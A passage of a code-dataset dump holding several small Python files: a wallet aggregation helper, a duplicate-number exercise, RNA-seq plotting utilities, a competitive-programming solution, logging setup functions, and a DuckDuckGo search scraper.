finalQuantity = typing.Operation.adjustQuantity(operation['type'], finalQuantity, operation['quantity'])\n operation['finalQuantity'] = finalQuantity\n\n result['finalQuantity'] = finalQuantity\n\n return result\n\n\ndef aggregate(assets, type: AggregationType):\n filt = _filter(type)\n ignored = []\n if filt:\n assetsSorted = sorted(assets, key=filt)\n for key, group in groupby(assetsSorted, filt):\n if key:\n assets = list(group)\n else:\n ignored = list(group)\n\n key = _key(type)\n assets = sorted(assets, key=key)\n\n pos = 0\n while pos < len(assets)-1:\n if key(assets[pos]) != key(assets[pos+1]):\n pos += 1\n continue\n\n assets[pos] = _merge(assets[pos], assets[pos+1])\n del assets[pos+1]\n\n return ignored + assets\n","repo_name":"kpk-pl/wallet","sub_path":"web-gui/flaskr/analyzers/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12849935446","text":"def duplicate_number(arr):\n \"\"\"\n :param - array containing numbers in the range [0, len(arr) - 2]\n return - the number that is duplicate in the arr\n \n numbers_dict = dict()\n result = 0\n for digit in arr:\n if numbers_dict.get(digit, 0) == 0:\n numbers_dict[digit] = 1\n elif numbers_dict[digit] == 1:\n numbers_dict[digit] = 2\n result = digit\n break\n \n return result\n \"\"\"\n current_sum = 0\n expected_sum = 0\n \n for num in arr:\n current_sum += num\n\n for i in range(len(arr) - 1):\n expected_sum += i\n \n return current_sum - expected_sum\n\ndef test_function(test_case):\n arr = test_case[0]\n solution = test_case[1]\n output = duplicate_number(arr)\n if output == solution:\n print(\"Pass\")\n else:\n print(\"Fail\")\n\narr = [0, 0]\nsolution = 0\n\ntest_case = [arr, solution]\ntest_function(test_case)\n\narr = [0, 2, 3, 1, 4, 5, 3]\nsolution = 3\n\ntest_case = [arr, solution]\ntest_function(test_case)\n\narr = [0, 1, 5, 4, 3, 2, 0]\nsolution = 0\n\ntest_case = [arr, solution]\ntest_function(test_case)\n\narr = [0, 1, 5, 5, 3, 2, 4]\nsolution = 5\n\ntest_case = [arr, solution]\ntest_function(test_case)\n\narr = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 11]\nsolution = 11\n\ntest_case = [arr, solution]\ntest_function(test_case)","repo_name":"marcotello/PythonPractices","sub_path":"DataStrucutures/Arrays/duplicate_numbers.py","file_name":"duplicate_numbers.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15211351945","text":"#module for storing RNA-Seq pipeline auxiliary functions\nimport sys\n#1) Imports, this relies on utils keeping same relative path\nutil_dir = '../../common_scripts/pipe_utils/'\nsys.path.append(util_dir)\nfrom import_file import *\nimport matplotlib.ticker as plticker\n\ndef get_fasta(infasta, outfasta, write_all = True, get_chr = None):\n '''\n Given a multifasta, split into individual files.\n Can be useful for testing tools.\n If get_chr != None, will write a matching fasta. Otherwise will write all.\n #also see notebook C2.19c\n '''\n records = SeqIO.to_dict(SeqIO.parse(infasta, \"fasta\"))\n\n for k in records:\n records[k].name = ''\n records[k].description = ''\n\n with open(outfasta, 'w') as g:\n for k in records:\n SeqIO.write(records[k], g, 'fasta')\n\ndef test_plot():\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.scatter(range(0, 10), range(0, 10), color = 'k', s = 10)\n #ax.text(0.1, 0.8, 'r2 = %1.3f\\nn = %s' % (r2_val, num_plotted), transform = ax.transAxes)\n plt.savefig('testplot.png')\n plt.close(fig)\n\n #label_axes(ax, xname = xname, yname = yname, label_index_level = label_index_level, axis_title_suffix = axis_title_suffix)\n return fig\n #return {'num_plotted': num_plotted, 'fig': fig, 'ax': ax}\n\n\ndef remove_spikeins(df, spikenames = ['ERCC', 'SIRV']):\n '''\n Remove all rows with index starting with spikein names, e.g. ERCC and SIRV\n '''\n all_txts = set(df.index.values)\n allspike = set()\n for s in spikenames:\n geneset = set([i for i in all_txts if i.startswith(s)])\n allspike = allspike | geneset\n\n #Remove ERCC and SIRV genes from dataset as we don't want to plot these for gene reproducibility\n df.drop(labels = allspike, inplace = True)\n\ndef quick_barplot(df, cols = None, label_index_level = None, axis_title_suffix = '', title = '', limits = None, ticklabels = None, **kwargs):\n '''\n Make quick barplot to summarize count data,\n for example from the spike-in or rRNA-mapping reads\n Input:\n a dataframe (df) containing y_col values to plot, x_col ids\n divide_by = a number which all values in y_col will be divided by\n percent = convert fraction to percent for plotting\n '''\n #normalize values, this will change the col_to_plot\n x_col, y_col = cols[0:]\n col_to_plot = y_col\n if kwargs['divide_by'] != 1:\n df['frac'] = df[y_col]/kwargs['divide_by']\n col_to_plot = 'frac'\n\n if kwargs['percent'] == True:\n df['percent'] = df['frac']*100\n col_to_plot = 'percent'\n\n height = 4\n width_ratio = len(df)/16\n width = height*width_ratio\n if width < 4:\n width = 4\n fig = plt.figure(figsize = (width, height))\n ax = fig.add_subplot(111)\n ax = sns.barplot(data = df, x = x_col, y = col_to_plot, ax = ax)\n #just using text.set_rotation(45) doesn't allow you to align wrt the axis\n xlabels = df[x_col]\n #lining the right side of text box up with tick looks best of options, still not great\n ax.set_xticklabels(xlabels, rotation = 45, ha = 'right')\n plt.tight_layout()\n\n return {'df':df, 'fig': fig, 'ax': ax}\n\ndef stacked_bar(df, cols = None, label_index_level = None, axis_title_suffix = '', title = '', limits = None, ticklabels = None, **kwargs):\n #this scales the width of the bars but the legend is still plotted on top of the bars\n #normalize values, this will change the col_to_plot\n x_col = cols[0]\n y_cols = cols[1:]\n\n width = 4\n height = 4\n fig = plt.figure(figsize = (width, height))\n ax = fig.add_subplot(111)\n\n sns.barplot(data = df, x = x_col, y = y_cols[0], color = 'red', ax = ax)\n #need to pass 'cat_labels' to kwargs in order of cols\n bars = [plt.Rectangle((0,0),1,1,fc=\"red\", edgecolor = 'none')]\n for i in range(1, len(y_cols)):\n bottom_plot = sns.barplot(data = df, x = x_col, y = y_cols[i], color = 'blue', ax = ax)\n bars.append(plt.Rectangle((0,0),1,1,fc='#0000A3', edgecolor = 'none'))\n\n l = plt.legend(bars, kwargs['cat_labels'], loc = (1.04, 0.75), prop={'size':16})\n l.draw_frame(False)\n return {'fig': fig, 'ax': ax, 'bars':bars, 'extra_artists': [l]}\n\ndef plot_genomic_region(coverage, chrom, start, end, strand, positions = None):\n '''\n Given a genomic region and coverage HTSeq GA, plot reads mapping to that region\n [start, end) 0-based\n Also and option to pass a postion file which will then mark regions that overlap with those positions\n '''\n window = HTSeq.GenomicInterval(chrom, start, end, strand)\n wincvg = np.fromiter(coverage[window], dtype='i')\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(range(start, end), wincvg)\n ax.xaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n ax.set_ylim(bottom=0)\n ax.set_xlim(start, end)\n plt.xticks(rotation=45)\n ax.set_ylabel('read counts')\n ax.set_xlabel('position')\n\n return ax\n\ndef limit_df(df, colnames = None, min_val = None, max_val = None):\n '''\n Filter out data that is outside given min and max values\n '''\n\n for col in colnames:\n df = df[df[col].between(min_val, max_val, inclusive = True)].copy()\n\n df.dropna(subset = colnames, inplace = True)\n\n return df\n\ndef clean_df(df, cols = None):\n '''\n Replace inf values with nan & drop nan-containing rows over given columns\n This needs to be done before analysis and/or after log-transform\n '''\n #print('cleaning')\n df.replace([np.inf, -np.inf], np.nan, inplace = True)\n df.dropna(axis = 0, how = 'any', subset = cols, inplace = True)\n\ndef cdf_plot(df, x_col = None, bg_group = 'all', group_col = None, nbins = 100, x_label = None, y_label = None, filename = None, logbase = None, title = None):\n '''\n Plot data in given column and a group_by variable as CDF\n x_col = the name of the column containing the data\n group_col = the name of the column containing the classification variable, e.g. short, long\n nbins = number of bins to use\n '''\n fig = plt.figure(figsize = (8, 8))\n ax = fig.add_subplot(111)\n\n groups = df[group_col].unique()\n groups = sorted(groups)\n\n #bring bg group to front if we are not using a specific bg group\n if bg_group != 'all':\n groups.insert(0, groups.pop(groups.index(bg_group)))\n first_df = None\n #build first df from first group\n #otherwise the first group will be the whole dataset, named 'all'\n else:\n groups.pop(groups.index('bg'))\n groups.insert(0, 'all')\n first_df = df\n\n all_bins = []\n all_cdfs = []\n handles = []\n labels = []\n\n for i in range(0, len(groups)):\n if i == 0:\n if first_df is not None:\n sub_df = first_df\n else:\n sub_df = df[df[group_col] == groups[i]].copy()\n else:\n sub_df = df[df[group_col] == groups[i]].copy()\n\n data = sub_df[x_col]\n counts, bin_edges = np.histogram(data, bins = nbins, normed = True)\n cdf = np.cumsum(counts)\n all_cdfs.append(cdf)\n all_bins.append(bin_edges)\n l, = plt.plot(bin_edges[1:], cdf/cdf[-1])\n handles.append(l)\n\n if i == 0:\n if bg_group != 'all':\n bg_data = data\n else:\n bg_data = df[x_col]\n labels.append('{:}, n={:}'.format(groups[i], len(data)))\n else:\n stat, pval = sp.stats.ks_2samp(bg_data, data)\n labels.append('{:}, n={:}, p={:.2E}'.format(groups[i], len(data), Decimal(pval)))\n\n plt.legend(handles, labels)\n\n #ax.text(0.1, 0.9, 'r2 = %1.3f\\nn = %s' % (r2_val, num_plotted), transform = ax.transAxes, fontsize = 12)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n plt.title(title)\n if filename != None:\n plt.savefig('%s.png' % filename)\n plt.close(fig)\n else:\n return ax\n\ndef barhist_plot(df, cols = None, label_index_level = None, axis_title_suffix = '', filename = None, title = '', limits = None, ticklabels = None):\n '''\n Make histogram with bars\n I think this is currently only compatible with plotting a single histogram on the axis\n '''\n #mu = np.median(to_plot_x)\n #sigma = np.std(to_plot_x)\n normed = False\n\n fig = plt.figure(figsize = (8,8))\n ax = fig.add_subplot(111)\n # the histogram of the data\n ##n, bins, patches = plt.hist(df[cols], 100, normed=normed, facecolor='blue', alpha=0.8, histtype = 'bar')\n\n # add a 'best fit' line\n #y = mlab.normpdf( bins, mu, sigma)\n nbins = 100\n ax.hist(df[cols], bins = nbins)\n ##ax = plt.plot(bins, patches, 'r--', linewidth=1)\n return {'ax': ax}\n\ndef barhist_plot2(df, cols = None, label_index_level = None, axis_title_suffix = '', title = ''):\n '''\n Make histogram with bars\n I think this is currently only compatible with plotting a single histogram on the axis\n '''\n #mu = np.median(to_plot_x)\n #sigma = np.std(to_plot_x)\n\n # the histogram of the data\n n, bins, patches = plt.hist(df[cols], 100, normed=normed, facecolor='blue', alpha=0.8, histtype = 'bar')\n\n # add a 'best fit' line\n #y = mlab.normpdf( bins, mu, sigma)\n\n ax = plt.plot(bins, y, 'r--', linewidth=1)\n return {'ax': ax}\n\ndef seaborn_box(df, cols = None, label_index_level = None, axis_title_suffix = '', title = '', limits = None, ticklabels = None):\n '''Seaborn style box plot'''\n sns.set(style = 'ticks')\n fig = plt.figure(figsize = (8,8))\n ax = sns.boxplot(data = df[cols])\n fig = ax.get_figure()\n sns.despine(offset = 10)\n\n return {'ax':ax, 'fig': fig}\n\ndef scatter_plot(df, cols = None, label_index_level = None, axis_title_suffix = '', title = '', limits = None, ticklabels = None, **kwargs):\n '''\n Make a multiscatter plot of all the combinations in given columns\n Also retun correlations for each\n '''\n #store results of each replicate as correlation dict\n corr_dict = {}\n num_plotted = len(df)\n fig = plt.figure(figsize = (8,8))\n xname = cols[0]\n yname = cols[1]\n corr = df[xname].corr(df[yname])\n r2_val = corr**2\n\n ax = fig.add_subplot(111)\n ax.scatter(df[xname], df[yname], color = 'k', s = 10)\n ax.text(0.1, 0.9, 'r2 = %1.3f\\nn = %s' % (r2_val, num_plotted), transform = ax.transAxes)\n\n #label_axes(ax, xname = xname, yname = yname, label_index_level = label_index_level, axis_title_suffix = axis_title_suffix)\n\n return {'num_plotted': num_plotted, 'fig': fig, 'ax': ax}\n\ndef reg_plot(df, cols = None, label_index_level = None, axis_title_suffix = '', title = '', limits = None, ticklabels = None, **kwargs):\n '''\n Make a scatterplot using seaborn's regplot\n '''\n #store results of each replicate as correlation dict\n corr_dict = {}\n num_plotted = len(df)\n fig = plt.figure(figsize = (8,8))\n xname = cols[0]\n yname = cols[1]\n corr = df[xname].corr(df[yname])\n r2_val = corr**2\n\n ax = fig.add_subplot(111)\n ax = sns.regplot(data = df, x = xname, y = yname, fit_reg = False)\n #ax.scatter(df[xname], df[yname], color = 'k', s = 10)\n ax.text(0.1, 0.9, 'r2 = %1.3f\\nn = %s' % (r2_val, num_plotted), transform = ax.transAxes)\n set_lim(ax, limits = limits)\n\n #label_axes(ax, xname = xname, yname = yname, label_index_level = label_index_level, axis_title_suffix = axis_title_suffix)\n\n return {'num_plotted': num_plotted, 'fig': fig, 'ax': ax}\n\n\ndef multiscatter_plot(df, cols = None, label_index_level = None, axis_title_suffix = '', filename = None, title = '', limits = None, ticklabels = None):\n '''\n Make a multiscatter plot of all the combinations in given columns\n Also retun correlations for each\n '''\n #store results of each replicate as correlation dict\n corr_dict = {}\n num_plotted = len(df)\n pairs = [pair for pair in itertools.combinations(range(len(cols)), 2)]\n fig = plt.figure(figsize = (8,8))\n n = 1\n for pair in pairs:\n xi = pair[0]\n yi = pair[1]\n xname = cols[pair[0]]\n yname = cols[pair[1]]\n corr = df[xname].corr(df[yname])\n r2_val = corr**2\n corr_dict['%s_v_%s' % (yname[label_index_level], xname[label_index_level])] = r2_val\n ax = fig.add_subplot(len(pairs) - 1, len(pairs) - 1, n)\n ax.scatter(df[xname], df[yname], color = 'k', s = 10)\n ax.text(0.1, 0.8, 'r2 = %1.3f\\nn = %s' % (r2_val, num_plotted), transform = ax.transAxes)\n ax.set_xlabel('%s %s' % (xname[label_index_level], axis_title_suffix))\n ax.set_ylabel('%s %s' % (yname[label_index_level], axis_title_suffix))\n set_lim(ax, limits = limits)\n #put this in temporarily to see if it will draw it now:\n #fig.canvas.draw()\n set_ticklabels(ax, fig, ticklabels = ticklabels)\n\n n += 1\n\n return {'ax': ax, 'corr_dict': corr_dict, 'num_plotted': num_plotted, 'fig': fig}\n\n\ndef log_transform(df, cols = None, logbase = None, label_index_level = None):\n '''Transform columns with given logbase and return new df and column names'''\n if logbase in np_log_transforms:\n logcols = []\n for col in cols:\n #if col is a tuple, we're dealing with a hierarchical index\n #for now I'm assuming the next level (label_index_level + 1) will have the name of the data to transform\n\n #if label_index_level = 0, indicates that we are plotting different reps against each other\n #if label_index_level = 1, indicates that we are plotting different columns from same rep against each other\n #maybe this should be made more flexible in the future\n if type(col) == tuple:\n newcol = (col[0], '%s_log' % col[1])\n else:\n newcol = '%s_log' % col\n\n df[newcol] = df[col].apply(np_log_transforms[logbase])\n logcols.append(newcol)\n else:\n raise NotImplementedError('logbase %s not supported' % logbase)\n\n #shouldn't need to retun df, as it should be modified here\n return logcols\n\ndef label_axes(ax, xname = None, yname = None, label_index_level = None, axis_title_suffix = ''):\n '''\n label x and y-axes of plot\n If passed with only xname or yname, probably a 1D plot, only label that axis\n '''\n #if it's a multiIndex df, we'd like to specify which level to use,\n #but if it's a single index, then this is going to slice the string which is not what we want\n if type(xname) == tuple:\n ax.set_xlabel('%s %s' % (xname[label_index_level], axis_title_suffix))\n ax.set_ylabel('%s %s' % (yname[label_index_level], axis_title_suffix))\n else:\n ax.set_xlabel('%s %s' % (xname, axis_title_suffix))\n ax.set_ylabel('%s %s' % (yname, axis_title_suffix))\n\ndef set_lim(ax, limits = None):\n if limits != None:\n if 'x' in limits:\n ax.set_xlim(limits['x'][0], limits['x'][1])\n if 'y' in limits:\n ax.set_ylim(limits['y'][0], limits['y'][1])\n\ndef set_ticklabels(ax, fig, ticklabels = None):\n '''\n Swap out default tick labels for custom\n '''\n if ticklabels != None:\n #without calling canvas.draw(), ticklabels may all be set to ''\n fig.canvas.draw()\n if 'xlabel' in ticklabels:\n for tick in ax.get_xticklabels():\n newlabel = ticklabels['xlabel'].get(tick.get_text(), '')\n tick.set_text(newlabel)\n ax.set_xticklabels(ax.get_xticklabels())\n if 'ylabel' in ticklabels:\n for tick in ax.get_yticklabels():\n newlabel = ticklabels['ylabel'].get(tick.get_text(), '')\n tick.set_text(newlabel)\n ax.set_yticklabels(ax.get_yticklabels())\n\ndef save(fig, filename = None, title = '', figformat = 'png', extra_artists = None):\n '''\n Save figure\n '''\n #extra_artists = extra_artists[0]\n #plt.tight_layout()\n plt.suptitle(title)\n #plt.subplots_adjust(top = 0.9)\n plt.savefig('%s.%s' % (filename, figformat), bbox_extra_artists = (extra_artists), bbox_inches = 'tight')\n ##plt.savefig('%s.%s' % (filename, figformat))\n ##plt.close(fig)\n\ndef filter_df(df, filter_col = None):\n '''\n Remove rows that are not = True in this column\n If filter_col is actually a list, e.g. [('rep1', 'filter'), ('rep2', 'filter'),...]\n Then this is probably from a multiIndex and test if they all match filter\n '''\n\n #test if there are one or two levels in df:\n if type(filter_col) == list:\n filter_mask = df.loc[:, filter_col].all(axis = 1)\n df = df[filter_mask].copy()\n\n #only 1 level of indexing\n else:\n df = df[df[filter_col] == True].copy()\n\n ##if you don't return the copy made here, then it won't update the one we're working on\n #is there a pandas command to directly modify the copy inplace rather than creating yet another copy?\n return df\n\ndef add_text(ax, s, x, y):\n '''\n note: Adding this because doing it after return seems to put in different place\n '''\n ax.text(x, y, s, transform = ax.transAxes)\n\ndef plot(df, cols = None, plottype = None, logbase = None, title = '', label_index_level = 0, axis_title_suffix = '', filter_col = None, filename = None, limits = None, figformat = 'png', ticklabels = None, labels = None, **kwargs):\n '''\n Given a df and plottype, clean up data and then send to plotting function\n df = pandas dataframe, cols = list of columns with data, plottype = 'scatter', etc.\n filter_column = name of column whose values need to be True to include in the analysis\n limits = {'x':[-1, 1], 'y':[-1, 1]}, for a 1D plot, only use x\n labels = {'ylabel':ylabel, 'xlabel':xlabel} #will overwrite any inferred labels from the column names\n ticklabels = {'xticks':[tick1, tick2,...], 'yticks':[tick1, tick2, ...]} #will overwrite any existing ticklabels\n '''\n #make a copy of the df here. All subsequent operations will modify this copy\n df = df.copy()\n\n if filter_col != None:\n df = filter_df(df, filter_col = filter_col)\n\n df = df[cols].copy()\n clean_df(df, cols = cols)\n\n #get new log-transformed columns if required\n if logbase != None:\n cols = log_transform(df, cols = cols, logbase = logbase, label_index_level = label_index_level)\n clean_df(df, cols = cols)\n\n #send to plotting fxn, which will return plot-specific analyses in the results dict\n results = plot_fxn_dict[plottype](df, cols = cols, title = title, label_index_level = label_index_level, axis_title_suffix = axis_title_suffix, limits = limits, ticklabels = ticklabels, **kwargs)\n\n #formatting, because this works by axis, this is called separately in the multiaxis functions\n if plottype not in ['multiscatter', 'multiscatter2']:\n if limits != None:\n set_lim(results['ax'], limits = limits)\n\n if ticklabels != None:\n #without calling canvas.draw(), ticklabels may all be set to ''\n set_ticklabels(results['ax'], results['fig'], ticklabels = ticklabels)\n\n\n #this doesn't work:(, get_xticklabels not defined. Dang... How can you accomplish this then?\n\n if labels != None:\n if 'xlabel' in labels:\n results['ax'].set_xlabel(labels['xlabel'])\n if 'ylabel' in labels:\n results['ax'].set_ylabel(labels['ylabel'])\n\n #todo: maybe set an option to print the ticklabels\n #as with different ranges will be really difficult to tell what the actual labels will be in advance\n if 'text' in kwargs:\n add_text(results['ax'], *kwargs['text'])\n\n if 'ax_loc' in kwargs:\n loc = plticker.MultipleLocator(base = float(kwargs['ax_loc'])) # this locator puts ticks at regular intervals\n results['ax'].yaxis.set_major_locator(loc)\n results['ax'].xaxis.set_major_locator(loc)\n\n if 'xy_line' in kwargs:\n lims = [\n np.min([results['ax'].get_xlim(), results['ax'].get_ylim()]),\n np.max([results['ax'].get_xlim(), results['ax'].get_ylim()])\n ]\n # min of both axes # max of both axes\n results['ax'].plot(lims, lims, 'k-', linestyle = '--')\n\n #hacky fix for now, but should make a default results_dict with these keys\n if 'extra_artists' not in results:\n results['extra_artists'] = None\n\n save(results['fig'], filename = filename, title = title, figformat = figformat, extra_artists = results['extra_artists'])\n #avoid cropping legend on file save: https://stackoverflow.com/questions/10101700/moving-matplotlib-legend-outside-of-the-axis-makes-it-cutoff-by-the-figure-box\n #results['fig'].savefig(filename, bbox_extra_artists=(l,), bbox_inches='tight')\n\n #Uncomment for normal use but while debugging, if you close, will not display in Jupyter\n plt.close(results['fig'])\n\n #print('saved fig')\n return results\n\nplot_fxn_dict = {'multiscatter':multiscatter_plot, 'scatter':scatter_plot, 'box':seaborn_box, 'hist':barhist_plot, 'quickbar':quick_barplot, 'regplot': reg_plot, 'stacked_bar': stacked_bar}\nnp_log_transforms = {2: np.log2, 10: np.log10}\n\n#https://stackoverflow.com/questions/41122923/getting-empty-tick-labels-before-showing-a-plot-in-matplotlib\n","repo_name":"marykthompson/rateseq_pipelines","sub_path":"common_scripts/pipe_utils/pipeline_aux.py","file_name":"pipeline_aux.py","file_ext":"py","file_size_in_byte":21092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15174593099","text":"import math\r\n\r\nN = int(input())\r\npt = 1\r\npa = 1\r\nfor i in range(N):\r\n t, a = map(int, input().split())\r\n\r\n t_ratio = pt // t\r\n a_ratio = pa // a\r\n if pt % t != 0:\r\n t_ratio += 1\r\n if pa % a != 0:\r\n a_ratio += 1\r\n min_ratio = max(t_ratio, a_ratio)\r\n pt = t * min_ratio\r\n pa = a * min_ratio\r\n\r\nprint(pt+pa)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc062/A/4842588.py","file_name":"4842588.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"16730333171","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\nimport logging\n\n\ndef setup_logger(logger_name, log_file, level=logging.DEBUG): #.INFO\n lz = logging.getLogger(logger_name)\n \n #formatter = logging.Formatter('%(asctime)s : %(message)s')\n formatter =logging.Formatter('Date-Time : %(asctime)s : Line No. : %(lineno)d - %(name)s- %(levelname)s - %(message)s')\n fileHandler = logging.FileHandler(log_file, mode='w')\n fileHandler.setFormatter(formatter)\n lz.setLevel(level)\n lz.addHandler(fileHandler)\n streamHandler = logging.StreamHandler()\n streamHandler.setFormatter(formatter)\n lz.addHandler(streamHandler) #-> si se activa sale por pantalla\n\n\ndef setup_logger2(logger_name, log_file, consoleLevel=logging.DEBUG, fileLevel=logging.DEBUG):\n lz = logging.getLogger(logger_name)\n # Create handlers\n # Console\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logging.Formatter('%(name)s - %(message)s'))\n consoleHandler.setLevel(consoleLevel)\n\n # File\n log_file = log_file\n fileHandler = logging.FileHandler(log_file, mode='w')\n fileHandler.setFormatter(logging.Formatter(\n 'Date-Time : %(asctime)s : Line No. : %(lineno)d - %(name)s- %(process)d - %(levelname)s - %(message)s'))\n fileHandler.setLevel(fileLevel)\n\n lz.addHandler(consoleHandler)\n lz.addHandler(fileHandler)\n\n lz.debug(\"test mensaje debug\")\n lz.info(\"test mensaje info\")\n lz.warning(\"test mensaje warning\")\n lz.critical(\"test mensaje critical\")\n return\n # los unicos mensajes que se graban son de nivel warning para arriba\n","repo_name":"pjseoane/FIX-Rofex2020.1","sub_path":"Logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34912347136","text":"#!/usr/bin/python3\n\n\"\"\"module containing 'MyList' Class\"\"\"\n\n\nclass MyList(list):\n \"\"\"class MyList that inherits 'list' class\"\"\"\n\n def print_sorted(self):\n \"\"\"prints the list, but sorted (ascending sort)\"\"\"\n list_cpy = self.copy()\n list_cpy.sort()\n print(list_cpy)\n","repo_name":"Fadyy22/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/1-my_list.py","file_name":"1-my_list.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74445729833","text":"import time\nimport requests\nimport random\nfrom bs4 import BeautifulSoup\nfrom helper import printer\nfrom utils.randomuser import users\n\n\nclass Search:\n \"\"\"\n Searches for a given query on DuckDuckGo.\n\n :param query: The query to search for.\n \"\"\"\n def __init__(self, query):\n url = \"https://duckduckgo.com/html/?q=\" + query\n headers = {\"User-Agent\": random.choice(users)}\n\n try:\n with requests.get(url, headers=headers) as response:\n response.raise_for_status() # Raise exception if request fails\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n results = soup.find_all(\"div\", {\"class\": \"result__body\"})\n\n if len(results) == 0:\n printer.error(f\"No results found for '{query}'..!\")\n return\n\n printer.info(f\"Searching for '{query}' -- With the agent '{headers['User-Agent']}'\")\n time.sleep(1)\n for result in results:\n self.print_search_result(result)\n\n except requests.exceptions.RequestException as e:\n printer.error(f\"Error: {e}\")\n except KeyboardInterrupt:\n printer.error(\"Cancelled..!\")\n\n def print_search_result(self, result):\n \"\"\"\n Prints the result of a search.\n\n :param result: The result to print.\n \"\"\"\n title = result.find(\"a\", {\"class\": \"result__a\"}).text\n link = result.find(\"a\", {\"class\": \"result__a\"})[\"href\"]\n status_code = self.get_status_code(link)\n printer.success(f\"'{title}' - {link} - [{status_code}]\")\n\n @staticmethod\n def get_status_code(url):\n \"\"\"\n Retrieves the status code of a given URL.\n\n :param url: The URL to check.\n :return: The status code if the request is successful, or None otherwise.\n \"\"\"\n try:\n with requests.get(url, stream=True) as response:\n response.raise_for_status()\n return response.status_code\n except requests.exceptions.RequestException:\n return None\n","repo_name":"Manan2401/Recon_All","sub_path":"utils/websearch.py","file_name":"websearch.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}